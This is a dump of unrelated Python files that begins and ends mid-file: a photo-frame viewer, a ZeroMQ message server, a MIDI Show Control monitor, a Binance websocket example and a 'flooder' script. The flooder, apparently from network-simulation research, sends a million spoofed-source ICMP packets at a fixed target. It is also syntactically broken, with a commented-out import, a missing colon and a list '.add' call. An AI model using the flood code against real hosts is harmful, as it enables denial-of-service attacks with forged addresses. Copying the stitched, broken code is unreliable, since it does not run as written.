saver.save_if_required()
process_time = time.time() - start_time
stats = {"wait_time": wait_time,
"process_time": process_time,
"pending": episodes.qsize(),
"replay_memory": replay_memory.stats}
if losses:
stats['loss'] = {"min": float(np.min(losses)),
"median": float(np.median(losses)),
"mean": float(np.mean(losses)),
"max": float(np.max(losses))}
print "STATS\t%s\t%s" % (util.dts(), json.dumps(stats))
if __name__ == '__main__':
queued_episodes = Queue(5)
enqueue_process = Process(target=run_enqueue_server, args=(queued_episodes,))
enqueue_process.daemon = True
enqueue_process.start()
trainer_process = Process(target=run_trainer, args=(queued_episodes, opts))
trainer_process.daemon = True
trainer_process.start()
while True:
time.sleep(10)
|
photo.py
|
# /usr/bin/env python3
import configparser
import datetime
import http.server
import os
import random
import signal
import socketserver
from threading import Thread, Timer
import time
import urllib.parse
import requests
import utils
from utils import debug, enc, error, info, runproc, BASE_KEY, CONFIG_FILE
MONITOR_CMD = "echo 'on 0' | /usr/bin/cec-client -s -d 1"
BROWSER_CYCLE = 60
PORT = 9001
def swapext(pth, ext):
"""Replaces the extension for the specified path with the supplied
extension.
"""
ext = ext.lstrip(".")
dirname = os.path.dirname(pth)
basename = os.path.basename(pth)
newname = "%s.%s" % (os.path.splitext(basename)[0], ext)
return os.path.join(dirname, newname)
def fb_path(pth):
"""Given a path to an image file, returns the corresponding path the the
frame buffer directory with the same name but with the '.fb' extension.
"""
img_name = os.path.basename(pth)
fb_name = swapext(img_name, "fb")
return os.path.join(FB_PHOTODIR, fb_name)
def clean_fb(pth):
"""Deletes the frame buffer version of an image if it exists"""
fb = fb_path(pth)
if os.path.exists(fb):
os.unlink(fb)
def get_freespace():
stat = os.statvfs(".")
freespace = stat.f_frsize * stat.f_bavail
debug("Free disk space =", freespace)
return freespace
def run_webserver(mgr):
with socketserver.TCPServer(("", PORT), PhotoHandler) as httpd:
httpd.mgr = mgr
info("Webserver running on port", PORT)
httpd.serve_forever()
class PhotoHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == "/status":
mgr = self.server.mgr
url = mgr.get_url()
start = time.time()
while not url:
if (time.time() - start) > BROWSER_CYCLE:
url = mgr.get_last_url()
break
time.sleep(1)
url = mgr.get_url()
mgr.clear_url()
self.send_response(200)
self.end_headers()
debug("Writing photo URL to browser")
self.wfile.write(enc(url))
else:
with open("main.html") as ff:
html = ff.read()
debug("Writing HTML to browser")
self.send_response(200)
self.end_headers()
self.wfile.write(enc(html))
class ImageManager(object):
def __init__(self):
self._started = False
self._in_read_config = False
self.photo_timer = None
self.timer_start = None
self.photo_url = ""
self.last_url = ""
self._read_config()
self.initial_interval = self._set_start()
self._set_power_on()
self.in_check_host = False
self.image_list = []
self.displayed_name = ""
self.image_index = 0
self._register()
self.start_server()
def start(self):
# self.check_webbrowser()
self._set_signals()
self.set_timer()
self._started = True
self.show_photo()
self.main_loop()
def main_loop(self):
"""Listen for changes on the key for this host."""
debug("Entering main loop; watching", self.watch_key)
# Sometimes the first connection can be very slow - around 2 minutes!
power_key = "{}power_state".format(self.watch_key)
debug("Power key:", power_key)
power_state = utils.read_key(power_key)
debug("Power State:", power_state)
self._set_power_state(power_state)
callback = self.process_event
utils.watch(self.watch_key, callback)
# Shouldn't reach here.
sys.exit(0)
def start_server(self):
t = Thread(target=run_webserver, args=(self,))
t.start()
debug("Webserver started")
def _set_power_on(self):
# Power on the monitor and HDMI output
debug("Powering on the monitor")
out, err = runproc(MONITOR_CMD)
debug("Power result", out.strip(), err.strip())
def _set_start(self):
now = datetime.datetime.now()
base_hour, base_minute = self.interval_base.split(":")
start_hour = now.hour if base_hour == "*" else int(base_hour)
if base_minute == "*":
start_minute = now.minute
else:
if start_hour == now.hour:
# We want to make up the offset from the current time and the
# start hour. First, determine how many minutes until we hit
# the start_minute.
diff = int(base_minute) - now.minute
if diff < 0:
diff += 60
interval_minutes = int(self.interval / 60)
start_minute = now.minute + (diff % interval_minutes)
else:
start_minute = base_minute
start_hour = start_hour if start_minute >= now.minute else start_hour + 1
start_day = now.day if start_hour >= now.hour else now.day + 1
if start_minute >= 60:
start_minute = start_minute % 60
start_hour += 1
if start_hour >= 24:
start_hour = start_hour % 24
start_day += 1
start = now.replace(
day=start_day, hour=start_hour, minute=start_minute, second=0, microsecond=0
)
offset = start - now
offset_secs = offset.total_seconds()
return offset_secs if offset_secs > 0 else 0
def set_timer(self, start=True):
diff = self.interval * (self.variance_pct / 100)
interval = round(random.uniform(self.interval - diff, self.interval + diff))
if self.photo_timer:
self.photo_timer.cancel()
self.photo_timer = Timer(interval, self.on_timer_expired)
debug("Timer {} created with interval {}".format(id(self.photo_timer), interval))
next_change = datetime.datetime.now() + datetime.timedelta(seconds=interval)
info("Next photo change scheduled for {}".format(next_change.strftime("%H:%M:%S")))
if start:
self.photo_timer.start()
self.timer_start = time.time()
info("Timer started")
def on_timer_expired(self):
info("Timer Expired")
self._register(heartbeat=True)
self.check_webserver()
self.navigate()
def _set_signals(self):
signal.signal(signal.SIGHUP, self._read_config)
signal.signal(signal.SIGTSTP, self.pause)
signal.signal(signal.SIGCONT, self.resume)
signal.signal(signal.SIGTRAP, self.navigate)
@staticmethod
def _set_power_state(val):
if val and val.lower() in ("stop", "off"):
sys.exit()
def _change_photo(self, val):
# I want to default to forward unless there is a specific request to
# move backwards.
forward = val[:4] != "back"
self.navigate(forward=forward)
def _set_settings(self, val):
"""The parameter 'val' will be a dict in the format of:
setting name: setting value
"""
self._update_config(val)
def _set_images(self, val):
self.image_list = val
self.navigate()
def process_event(self, key, val):
debug("process_event called; clearing heartbeat flag")
utils.clear_heartbeat_flag()
actions = {
"power_state": self._set_power_state,
"change_photo": self._change_photo,
"settings": self._set_settings,
"images": self._set_images,
}
info("Received key: {key} and val: {val}".format(key=key, val=val))
mthd = actions.get(key)
if not mthd:
error("Unknown action received:", key, val)
return
mthd(val)
def pause(self, signum=None, frame=None):
self.photo_timer.cancel()
info("Photo timer stopped")
def resume(self, signum=None, frame=None):
self.set_timer()
info("Photo timer started")
def _read_config(self, signum=None, frame=None):
if self._in_read_config:
# Another process already called this
return
self._in_read_config = True
info("_read_config called!")
parser = utils.parse_config_file()
self.pkid = utils.safe_get(parser, "frame", "pkid")
self.watch_key = BASE_KEY.format(pkid=self.pkid)
settings_key = "{}settings".format(self.watch_key)
settings = utils.read_key(settings_key)
if settings:
self.log_level = settings.get("log_level", "INFO")
self.name = settings.get("name", "undefined")
self.description = settings.get("description", "")
self.orientation = settings.get("orientation", "H")
# When to start the image rotation
self.interval_base = settings.get("interval_base", "*:*")
# How often to change image
self.interval_time = int(settings.get("interval_time", 10))
# Units of time for the image change interval
self.interval_units = settings.get("interval_units", "minutes")
# Percentage to vary the display time from photo to photo
self.variance_pct = int(settings.get("variance_pct", 0))
self.brightness = settings.get("brightness", 1.0)
self.contrast = settings.get("contrast", 1.0)
self.saturation = settings.get("saturation", 1.0)
else:
self.log_level = "INFO"
self.name = "undefined"
self.description = ""
self.orientation = "H"
# When to start the image rotation
self.interval_base = "*:*"
# How often to change image
self.interval_time = 10
# Units of time for the image change interval
self.interval_units = "minutes"
# Percentage to vary the display time from photo to photo
self.variance_pct = 0
self.brightness = 1.0
self.contrast = 1.0
self.saturation = 1.0
utils.set_log_level(self.log_level)
self.reg_url = utils.safe_get(parser, "host", "reg_url")
if not self.reg_url:
error("No registration URL in photo.cfg; exiting")
sys.exit()
self.dl_url = utils.safe_get(parser, "host", "dl_url")
if not self.dl_url:
error("No download URL configured in photo.cfg; exiting")
sys.exit()
self.interval = utils.normalize_interval(self.interval_time, self.interval_units)
self.set_image_interval()
self._in_read_config = False
def set_image_interval(self):
if not self.photo_timer:
# Starting up
return
self.set_timer()
def _register(self, heartbeat=False):
if heartbeat:
# Set the heartbeat flag
debug("Setting heartbeat file...")
utils.set_heartbeat_flag()
headers = {"user-agent": "photoviewer"}
# Get free disk space
freespace = get_freespace()
data = {
"pkid": self.pkid,
"freespace": freespace,
}
resp = requests.post(self.reg_url, data=data, headers=headers)
if 200 <= resp.status_code <= 299:
# Success!
pkid, images = resp.json()
if pkid != self.pkid:
parser = utils.parse_config_file()
parser.set("frame", "pkid", pkid)
with open(CONFIG_FILE, "w") as ff:
parser.write(ff)
self.image_list = images
random.shuffle(self.image_list)
else:
error(resp.status_code, resp.text)
sys.exit()
@staticmethod
def check_webbrowser():
if not utils.check_browser():
info("Web browser not running; restarting")
utils.start_browser()
def check_webserver(self):
if not utils.check_port(PORT):
info("Webserver port not listening; restarting")
self.start_server()
def navigate(self, signum=None, forward=True, frame=None):
"""Moves to the next image. """
debug("navigate called; current index", self.image_index)
num_images = len(self.image_list)
if not num_images:
# Currently no images specified for this display, so just return.
return
delta = 1 if forward else -1
new_index = self.image_index + delta
# Boundaries
max_index = len(self.image_list) - 1
min_index = 0
if new_index > max_index:
new_index = 0
# Shuffle the images
info("All images shown; shuffling order.")
random.shuffle(self.image_list)
elif new_index < min_index:
new_index = max_index
else:
new_index = max(0, min(max_index, new_index))
debug("image index", self.image_index)
debug("new index", new_index)
if new_index != self.image_index:
self.image_index = new_index
self.show_photo()
elif new_index == 0:
self.show_photo()
self.set_timer()
def show_photo(self):
if not self._started:
return
if not self.image_list:
return
try:
fname = self.image_list[self.image_index]
except IndexError as e:
error("BAD INDEX", e)
if self.image_list:
fname = self.image_list[-1]
else:
# Something's screwy
error("No images!")
return
if fname == self.displayed_name:
return
if self.timer_start:
elapsed = round(time.time() - self.timer_start, 2)
if elapsed:
info("Elapsed time:", utils.human_time(elapsed))
info("Showing photo", fname)
# self.photo_url = self.last_url = urllib.parse.quote_plus(os.path.join(self.dl_url, fname))
self.photo_url = self.last_url = os.path.join(self.dl_url, fname)
def get_url(self):
return self.photo_url
def get_last_url(self):
return self.last_url
def clear_url(self):
self.photo_url = ""
def _update_config(self, data):
changed = False
new_interval = False
parser = utils.parse_config_file()
if "log_level" in data:
self.log_level = data["log_level"]
utils.set_log_level(self.log_level)
for key in (
"name",
"description",
"interval_time",
"interval_units",
"variance_pct",
"brightness",
"contrast",
"saturation",
):
val = data.get(key, None)
debug("key:", key, "; val:", val)
if val is None:
continue
local_val = getattr(self, key)
if local_val != val:
try:
typ = type(local_val)
converted = typ(val)
except Exception:
pass
setattr(self, key, converted)
monitor_keys = ("brightness", "contrast", "saturation")
section = "monitor" if key in monitor_keys else "frame"
parser.set(section, key, str(val))
changed = True
new_interval = new_interval or "interval" in key
if changed:
with open(CONFIG_FILE, "w") as ff:
parser.write(ff)
if new_interval:
self.interval = utils.normalize_interval(self.interval_time, self.interval_units)
info("Setting timer to", self.interval)
self.set_image_interval()
def kill_timer(self):
"""Kills the photo timer on receiving a Ctrl-C."""
info("Killing timer")
self.photo_timer.cancel()
info("Timer canceled")
if __name__ == "__main__":
with open("photo.pid", "w") as ff:
ff.write("%s" % os.getpid())
img_mgr = ImageManager()
try:
debug("And we're off!")
img_mgr.start()
except KeyboardInterrupt:
img_mgr.kill_timer()
|
message_server.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Message Server."""
import logging
import zmq
import ast
import os
from threading import Thread
from zeus.common.utils import singleton
from zeus.common import JsonEncoder
__all__ = ["MessageServer"]
logger = logging.getLogger(__name__)
@singleton
class MessageServer(object):
"""Message server."""
def __init__(self):
"""Initialize message server."""
self.handlers = {}
self.min_port = 5000
self.max_port = 7000
self.port = None
self.register_handler("query_task_info", query_task_info)
def run(self, ip="*"):
"""Run message server."""
if self.port is not None:
return
try:
context = zmq.Context()
socket = context.socket(zmq.REP)
self.port = socket.bind_to_random_port(
f"tcp://{ip}", min_port=self.min_port, max_port=self.max_port, max_tries=100)
logging.debug("Start message monitor thread.")
monitor_thread = Thread(target=_monitor_socket, args=(socket, self.handlers))
monitor_thread.daemon = True
monitor_thread.start()
return self.port
except Exception as e:
logging.error("Failed to run message monitor thread.")
raise e
def register_handler(self, action, function):
"""Register messge handler."""
self.handlers[action] = function
def _monitor_socket(socket, handlers):
while True:
message = socket.recv_json()
logger.debug("Message arrived: {message}")
if "action" not in message:
socket.send_json({"result": "failed", "message": "Invalid request."}, cls=JsonEncoder)
continue
action = message.get("action")
if action not in handlers:
socket.send_json({"result": "failed", "message": f"Invalid action {action}."}, cls=JsonEncoder)
continue
data = message.get("data", None)
if isinstance(data, str):
try:
data = ast.literal_eval(data)
except Exception as e:
socket.send_json({"result": "failed", "message": f"{e}"}, cls=JsonEncoder)
continue
try:
if isinstance(data, dict):
result = handlers[action](**data)
elif "data" in message:
result = handlers[action](data)
else:
result = handlers[action]()
socket.send_json(result, cls=JsonEncoder)
except Exception as e:
socket.send_json({"result": "failed", "message": f"{e}"}, cls=JsonEncoder)
def query_task_info():
"""Get task message."""
from zeus.common.task_ops import TaskOps
return {
"result": "success",
"task_id": TaskOps().task_id,
"base_path": os.path.abspath(TaskOps().task_cfg.local_base_path),
}
|
main.py
|
# !/usr/bin/env python3
# -- coding: utf-8
"""MSC Monitor"""
__author__ = "Justin Stasiw"
__version__ = "$Revision 0.1b$"
__date__ = "$Date: 2021/08/05"
import mido
import mido.backends.rtmidi
from datetime import datetime
from threading import Thread
from pubsub import pub
import multiprocessing
from multiprocessing import Process, Queue
import wx
import sys
def GetMidiInputNames(queue):
names = mido.get_input_names()
queue.put(names)
class MSCPrintout(Thread):
def __init__(self):
Thread.__init__(self)
self.start()
self.MidiIn = None
mido.set_backend('mido.backends.rtmidi')
self.Command_Formats = {
0: "Reserved",
1: "Lighting",
2: "Moving Lights",
3: "Colour Changers",
4: "Strobes",
5: "Lasers",
6: "Chasers",
16: "Sound",
17: "Music",
18: "CD Players",
19: "EEPROM Playback",
20: "Audio Tape Machines",
21: "Intercoms",
22: "Amplifiers",
23: "Audio Effects Devices",
24: "Equalisers",
32: "Machinery",
33: "Rigging",
34: "Flys",
35: "Lifts",
36: "Turntables",
37: "Trusses",
38: "Robots",
39: "Animation",
40: "Floats",
41: "Breakaways",
42: "Barges",
48: "Video",
49: "Video Tape Machines",
50: "Video Cassette Machines",
51: "Video Disc Players",
52: "Video Switchers",
53: "Video Effects:",
54: "Video Character Generators",
55: "Video Still Stores",
56: "Video Monitors",
64: "Projection",
65: "Film Projectors",
66: "Slide Projectors",
67: "Video Projectors",
68: "Dissolvers",
69: "Shutter Controls",
80: "Process Control",
81: "Hydraulic Oil",
82: "H2O",
83: "CO2",
84: "Compressed Air",
85: "Natural Gas",
86: "Fog",
87: "Smoke",
88: "Cracked Haze",
96: "Pyro",
97: "Fireworks",
98: "Explosions",
99: "Flame",
100: "Smoke Pots",
127: "All-Types"
}
self.Command_Types = {
0: "Reserved",
1: "GO",
2: "STOP",
3: "RESUME",
4: "TIMED_GO",
5: "LOAD",
6: "SET",
7: "FIRE",
8: "ALL_OFF",
9: "RESTORE",
10: "RESET",
11: "GO_OFF",
16: "GO/JAM CLOCK",
17: "STANDBY_+",
18: "STANDBY_-",
19: "SEQUENCE_+",
20: "SEQUENCE_-",
21: "START_CLOCK",
22: "STOP_CLOCK",
23: "ZERO_CLOCK",
24: "SET_CLOCK",
25: "MTC_CHASE_ON",
26: "MTC_CHASE_OFF",
27: "OPEN_CUE_LIST",
28: "CLOSE_CUE_LIST",
29: "OPEN_CUE_PATH",
30: "CLOSE_CUE_PATH"
}
def run(self):
self.AvailableMidiPorts()
pub.subscribe(self.AvailableMidiPorts, 'refreshInterfaces')
def AvailableMidiPorts(self):
queue = Queue()
p = Process(target=GetMidiInputNames, args=(queue,))
p.start()
p.join()
AvailablePorts = queue.get()
AvailablePorts = list(dict.fromkeys(AvailablePorts))
pub.sendMessage('availablePorts', choices=AvailablePorts)
pub.subscribe(self.OpenMidiPort, "chosenPort")
def OpenMidiPort(self, port_to_open):
# Opens Midi Input Port, Starts thread for Midi Receive.
if self.MidiIn != None:
self.MidiIn.close()
try:
self.MidiIn = mido.open_input(port_to_open)
except:
print("Failed to open midi port")
try:
if MidiReceiveThread.is_alive():
pass
except:
MidiReceiveThread = Thread(target=self.MidiReceiveHandler, daemon=True)
MidiReceiveThread.start()
def MidiReceiveHandler(self):
# Passes off incoming midi from controller to the relevant Defs
if self.MidiIn != None:
for msg in self.MidiIn:
if msg.type == "sysex":
wx.CallAfter(self.MSCTranslator, msg)
del msg
def MSCTranslator(self, msg):
incoming_sysex = msg.data
# Check for MSC:
if incoming_sysex[0] == 127 and incoming_sysex[2] == 2:
Device_ID = str(incoming_sysex[1])
Command_Format = incoming_sysex[3]
if incoming_sysex[3] in self.Command_Formats:
Command_Format = self.Command_Formats[incoming_sysex[3]]
else:
Command_Format = "Invalid"
if incoming_sysex[4] in self.Command_Types:
Command_Type = self.Command_Types[incoming_sysex[4]]
else:
Command_Type = "Invalid"
remaining_data = incoming_sysex[5:]
size = len(remaining_data)
# List Comprehension magic that I don't really understand:
try:
idx_list = [idx + 1 for idx, val in enumerate(remaining_data) if val == 0]
res = [remaining_data[i:j] for i, j in
zip([0] + idx_list, idx_list + ([size] if idx_list[-1] != size else []))]
counter = 0
for i in res:
if i[-1] == 0:
i = i[:-1]
res[counter] = i
counter += 1
except:
res = [remaining_data]
try:
cue_number_data = res[0]
except:
cue_number_data = ""
try:
cue_list_data = res[1]
except:
cue_list_data = ""
try:
cue_path_data = res[2]
except:
cue_path_data = ""
cue_number_hex = ""
try:
if cue_number_data != "":
for i in cue_number_data:
cue_number_hex += hex(i)[2:]
cue_number_bytes = bytes.fromhex(cue_number_hex)
cue_number = cue_number_bytes.decode("ASCII")
else:
cue_number = ""
except:
cue_number = ""
cue_list_hex = ""
try:
if cue_list_data != "":
for i in cue_list_data:
cue_list_hex += hex(i)[2:]
cue_list_bytes = bytes.fromhex(cue_list_hex)
cue_list = cue_list_bytes.decode("ASCII")
else:
cue_list = ""
except:
cue_list = ""
cue_path_hex = ""
try:
if cue_path_data != "":
for i in cue_path_data:
cue_path_hex += hex(i)[2:]
cue_path_bytes = bytes.fromhex(cue_path_hex)
cue_path = cue_path_bytes.decode("ASCII")
else:
cue_path = ""
except:
cue_path = ""
current_time = datetime.now()
timestamp_str = current_time.strftime("%d-%b-%Y (%H:%M:%S)")
msg_to_snd = timestamp_str + ": Device ID:" + Device_ID + " Command Format:" + Command_Format + " Command Type:" + Command_Type + " Cue Number:" + cue_number + " Cue List:" + cue_list + " Cue Path:" + cue_path
pub.sendMessage('logUpdates', msg=msg_to_snd)
class MSCPrintoutGUI(wx.Frame):
def __init__(self):
super().__init__(parent=None, size=(900, 300), title="MSC Monitor")
panel = wx.Panel(self)
panel_sizer = wx.BoxSizer(wx.VERTICAL)
Listener_Text = wx.StaticText(panel, label="Select Interface:", style=wx.ALIGN_CENTER)
panel_sizer.Add(Listener_Text, 0, wx.ALL | wx.EXPAND, 5)
interface_sizer = wx.BoxSizer(wx.HORIZONTAL)
panel_sizer.Add(interface_sizer, 0, wx.ALL | wx.EXPAND, 5)
self.Refresh_Interfaces = wx.Button(panel, -1, "Refresh Interfaces")
interface_sizer.Add(self.Refresh_Interfaces, 0, wx.ALL | wx.EXPAND, 5)
self.Midi_Selector = wx.Choice(panel)
interface_sizer.Add(self.Midi_Selector, 1, wx.ALL | wx.EXPAND, 5)
self.Msg_Panel = wx.TextCtrl(panel, size=(-1, 150), style=wx.TE_MULTILINE | wx.TE_READONLY | wx.TE_DONTWRAP)
panel_sizer.Add(self.Msg_Panel, 1, wx.ALL | wx.EXPAND, 5)
Clear_Contents = wx.Button(panel, -1, "Clear MSC Log")
panel_sizer.Add(Clear_Contents, 0, wx.ALL | wx.EXPAND, 5)
panel.SetSizer(panel_sizer)
self.Show()
self.Processor = MSCPrintout()
self.Bind(wx.EVT_CHOICE, self.UpdateInterface)
self.Bind(wx.EVT_BUTTON, self.OnClicked)
self.Bind(wx.EVT_CLOSE, self.QuitApp)
pub.subscribe(self.Add_Msg, 'logUpdates')
pub.subscribe(self.Add_Choices, 'availablePorts')
self.midi_choices = None
menubar = wx.MenuBar()
wx.MenuBar.MacSetCommonMenuBar(menubar)
def Add_Msg(self, msg):
current_lines = self.Msg_Panel.GetNumberOfLines()
if current_lines <= 1000:
wx.CallAfter(self.Msg_Panel.AppendText, msg + "\n")
else:
#wx.CallAfter(self.Msg_Panel.Remove, 0, self.Msg_Panel.GetLineLength(0) + 1)
#This remove line is too process intensive. Can it be optimized?
#Hacky solution for now:
wx.CallAfter(self.Msg_Panel.Clear)
wx.CallAfter(self.Msg_Panel.AppendText, msg + "\n")
def Add_Choices(self, choices):
self.Midi_Selector.Clear()
self.Midi_Selector.Append("\n")
self.Midi_Selector.Append(choices)
self.midi_choices = [""] + choices
def UpdateInterface(self, event):
chosenPort = self.midi_choices[event.Selection]
pub.sendMessage('chosenPort', port_to_open=chosenPort)
def OnClicked(self, event):
btn = event.GetEventObject().GetLabel()
if btn == "Clear MSC Log":
wx.CallAfter(self.Msg_Panel.Clear)
elif btn == "Refresh Interfaces":
pub.sendMessage('refreshInterfaces')
def QuitApp(self, event):
print("Quitting App")
self.Destroy()
sys.exit()
if __name__ == "__main__":
multiprocessing.freeze_support()
app = wx.App()
frame = MSCPrintoutGUI()
app.MainLoop()
|
example_stream_everything.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_stream_everything.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2020, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager import BinanceWebSocketApiManager
import logging
import os
import requests
import sys
import time
import threading
try:
from binance.client import Client
except ImportError:
print("Please install `python-binance`! https://pypi.org/project/python-binance/#description")
sys.exit(1)
# https://docs.python.org/3/library/logging.html#logging-levels
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is not False:
pass
else:
time.sleep(0.01)
binance_api_key = ""
binance_api_secret = ""
channels = {'aggTrade', 'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_2h', 'kline_4h',
'kline_6h', 'kline_8h', 'kline_12h', 'kline_1d', 'kline_3d', 'kline_1w', 'kline_1M', 'miniTicker',
'ticker', 'bookTicker', 'depth5', 'depth10', 'depth20', 'depth', 'depth@100ms'}
arr_channels = {'!miniTicker', '!ticker', '!bookTicker'}
markets = []
try:
binance_rest_client = Client(binance_api_key, binance_api_secret)
binance_websocket_api_manager = BinanceWebSocketApiManager()
except requests.exceptions.ConnectionError:
print("No internet connection?")
sys.exit(1)
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
data = binance_rest_client.get_all_tickers()
for item in data:
markets.append(item['symbol'])
binance_websocket_api_manager.set_private_api_config(binance_api_key, binance_api_secret)
binance_websocket_api_manager.create_stream(["!userData"], ["arr"], stream_label="userData stream")
binance_websocket_api_manager.create_stream(arr_channels, "arr", stream_label="arr channels")
for channel in channels:
binance_websocket_api_manager.create_stream(channel, markets, stream_label=channel)
while True:
binance_websocket_api_manager.print_summary()
time.sleep(1)
|
sendpkts.py
|
#!/usr/bin/env python3.7
#
# File: sendpkts.py
#
# Description : flooder script
# Created by : Quinn Burke (qkb5007@psu.edu)
# Date : November 2019
# Last Modified : November 2019
### Imports ###
from random import randint, shuffle
# from scapy.all import *
import time
import threading
import sys
import numpy as np
import matplotlib.pyplot as plt
### Classes ###
class Flow():
def __init__(self, bytes_left=0, rate=0, duration=0, src_ip=None):
self.bytes_left = bytes_left
self.rate = rate
self.duration = duration
self.src_ip = src_ip
### Functions ###
def generateFlows(_sim_time, _client_rate):
num_flows = _sim_time * _client_rate
# See https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.random.pareto.html for generating samples with numpy pareto; specifically, using the formula below to obtain classical pareto from the pareto2/lomax dist
# generate sizes
xm1 = 10.0 # scale
a1 = 1.2 # shape
sizes = sorted((np.random.pareto(a1, num_flows) + 1) * xm1)
# generate durations
xm2 = 0.001
a2 = 1.5
durs = sorted((np.random.pareto(a2, num_flows) + 1) * xm2)
# sort/match to create flows
flows = [None]*num_flows
used_ips = list()
for i in range(num_flows):
src_ip = "10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(randint(12, 99)))
while src_ip in used_ips:
src_ip = "10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(randint(12, 99)))
used_ips.append(src_ip)
flows[i] = Flow(sizes[i], sizes[i]/durs[i], durs[i], src_ip)
gr = plt.GridSpec(1, 7, wspace=0.4, hspace=0.3)
cdf_sz = calc_cdf_fast(sizes)
plt.subplot(gr[:, :3])
plt.xlabel('Flow size (B)')
plt.ylabel('Cumulative Probability')
plt.title('Flow Sizes')
plt.plot(sizes, cdf_sz, color='green')
cdf_durs = calc_cdf_fast(durs)
plt.subplot(gr[:, 4:])
plt.xlabel('Durations (s)')
plt.ylabel('Cumulative Probability')
plt.title('Flow Durations')
plt.plot(durs, cdf_durs, color='red')
plt.show()
return flows
def calc_cdf_fast(arr):
cdf = []
for val in arr:
count = 0
for other_val in arr:
if other_val <= val:
count += 1
cdf.append(float(count*1.0/len(arr)))
return cdf
# def flood(_flows, flooder_idx):
def flood(_sim_time, _client_rate, _flows, _collection_interval):
# print("flows: ", _flows, "\nflooder_idx: ", flooder_idx)
# for i in range(1000):
# # print("[Flooder %d]: sending packets toward target 10.0.0.100..." %
# # flooder_idx)
# print("[Flooder]: sending packets toward target 10.0.0.100...")
# # pkt = IP(src="10.%s.%s.%s" % (str(randint(0, 255)), str(
# # randint(0, 255)), str(randint(12, 99))), dst="10.0.0.100")/ICMP()
# pkt = IP(src="10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(
# randint(12, 99))), dst="10.0.0.100")/ICMP()/Raw(load='0'*1472) # max load is size 1472 because of 28 bytes ICMP packet, so everything can fit into 1500 MTU
# print(pkt.summary(), "(len: ", len(pkt), ")")
# # send(pkt, count=10, inter=0.1, iface="uph-eth0")
# send(pkt, count=1000000, iface="uph-eth0")
active_flows = list()
shuffle(_flows) # shuffle them randomly
for i in range(_sim_time):
# add new flows to active_flows list
for i in range(_client_rate):
# do this before updating existing flows (as opposed to simulator's order) so we dont have to update separately
# add _client_rate flows to the active list so we can update activity below
active_flows.add(_flows.pop())
# update existing flows
total_send_bytes = 0
for flow in active_flows:
if flow.duration == 0: # from ~line 563 in Simulator.java
active_flows.remove(flow) # just remove (removed first in the simulator but we do it here)
elif flow.duration <= (1.0/_collection_interval):
total_send_bytes += flow.bytes_left # dump rest of bytes
flow.bytes_left = 0 # update these to get removed next iteration
flow.duration = 0
elif flow.duration > (1.0/_collection_interval):
if flow.bytes_left == 0: # line 617 (constant average rate)
active_flows.remove(flow)
elif flow.bytes_left <= flow.rate:
total_send_bytes += flow.bytes_left # dump rest of bytes
flow.bytes_left = 0 # update these to get removed next iteration
flow.duration = 0
elif flow.bytes_left > flow.rate:
total_send_bytes += flow.rate # dump rest of bytes
flow.bytes_left -= flow.rate
flow.duration -= (1.0/_collection_interval) # 1s collection interv granularity currently
else
active_flows.remove(flow) # just remove (?)
else:
active_flows.remove(flow) # just remove (?)
# send the flows toward the edge switch (ups) connecting to the servers (h1-h10)
# do we want to update the flows then send, or do we want to update the flows and send at the same time above? We want to send with respect to each source so aggregating them here with total_send_bytes may not be the correct way;
print("[Flooder]: sending packets toward target 10.0.0.100...")
pkt = IP(src="10.%s.%s.%s" % (str(randint(0, 255)), str(randint(0, 255)), str(
randint(12, 99))), dst="10.0.0.100")/ICMP()/Raw(load='0'*1472) # 1500 byte MTU
print(pkt.summary(), "(len: ", len(pkt), ")")
# send(pkt, count=10, inter=0.1, iface="uph-eth0")
send(pkt, count=1000000, iface="uph-eth0")
time.sleep(1)
if __name__ == '__main__':
# start = time.time_ns()
# f = [0]*1800000
# for i in range(1800000):
# f[i] = i
